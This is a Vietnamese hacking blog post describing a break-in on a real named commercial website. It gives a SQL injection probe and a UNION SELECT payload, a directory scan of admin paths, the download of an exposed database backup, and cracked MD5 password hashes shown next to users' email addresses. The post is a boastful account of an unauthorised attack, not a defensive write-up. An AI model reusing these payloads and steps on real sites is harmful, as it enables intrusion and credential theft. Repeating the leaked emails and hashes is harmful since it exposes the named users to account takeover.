[Hacking] Checked http://dongavn.com
http://dongavn.com/
Bug: SQL Injection, bài ca muôn thuở :">
Dạo vài vòng lượm thằng này ra thịt, thêm dấu nháy vào sau số 2 ;) phần còn lại vứt đi hem cần - Anh không cần em nữa đâu
Trích dẫn
http://dongavn.com/product_detail.php?id=2&PageNo=
-----------> http://dongavn.com/product_detail.php?id=2'
-----------> http://dongavn.com/product_detail.php?id=2'
Trích dẫn
http://dongavn.com/product_detail.php?id=-1%20union%20select%20all%201,2,3,4,version(),6,7,8,9,10,11--
11 số cũng hơi ít :"> SQL v4 - mò mệt đây :)) ...
Mò hoài k ra :D chán quá ... nhớ xựt lại có cái tool scan link admin , scan tùm lum cả, rinh ra scan chơi
Scan nó ra thế này
Trích dẫn
http://dongavn.com/admin ------------> TRUE (200 OK)
http://dongavn.com/login.php ------------> TRUE (200 OK)
http://dongavn.com/img-sys ------------> TRUE (200 OK)
http://dongavn.com/cgi-sys ------------> TRUE (403 Forbidden)
http://dongavn.com/java-sys ------------> TRUE (200 OK)
http://dongavn.com/document ------------> TRUE (200 OK)
http://dongavn.com/cgi-bin ------------> TRUE (403 Forbidden)
http://dongavn.com/data ------------> TRUE (200 OK)
FINISH
http://dongavn.com/login.php ------------> TRUE (200 OK)
http://dongavn.com/img-sys ------------> TRUE (200 OK)
http://dongavn.com/cgi-sys ------------> TRUE (403 Forbidden)
http://dongavn.com/java-sys ------------> TRUE (200 OK)
http://dongavn.com/document ------------> TRUE (200 OK)
http://dongavn.com/cgi-bin ------------> TRUE (403 Forbidden)
http://dongavn.com/data ------------> TRUE (200 OK)
FINISH
Thử vào http://dongavn.com/data xem thế nào :"> tải về 1 bức ảnh
Tiếp vào http://dongavn.com/document có màu rồi à nha :)
Click vào ngayvui_dongaco_utf8_genaral_ci_backup.gz oachj đã đã :"> thui thì lượm hột nó
Dzo` dzo` lại MD5 :D hơi khổ đây copy "nó" paste lên http://passcracking.com :)
Trích dẫn
o0o_sisoft_o0o@yahoo.com --- 23977841f0460d43029c6824d46ad4ba --- dienxxxxx
tnhungvt@yahoo.com --- aad71031802d905e73258ad33624c016 --- 711xxxx
tnhungvt@yahoo.com --- aad71031802d905e73258ad33624c016 --- 711xxxx
:D giờ hem bít /admin chơi ka :">
Đừng deface nó nhá ...
Anh em đi nhậu hít, mình gà hem bít nhậu rãnh rỗi mò mò chơi



[hacking] Tool Scan
[Hacking] Keylog lạ 

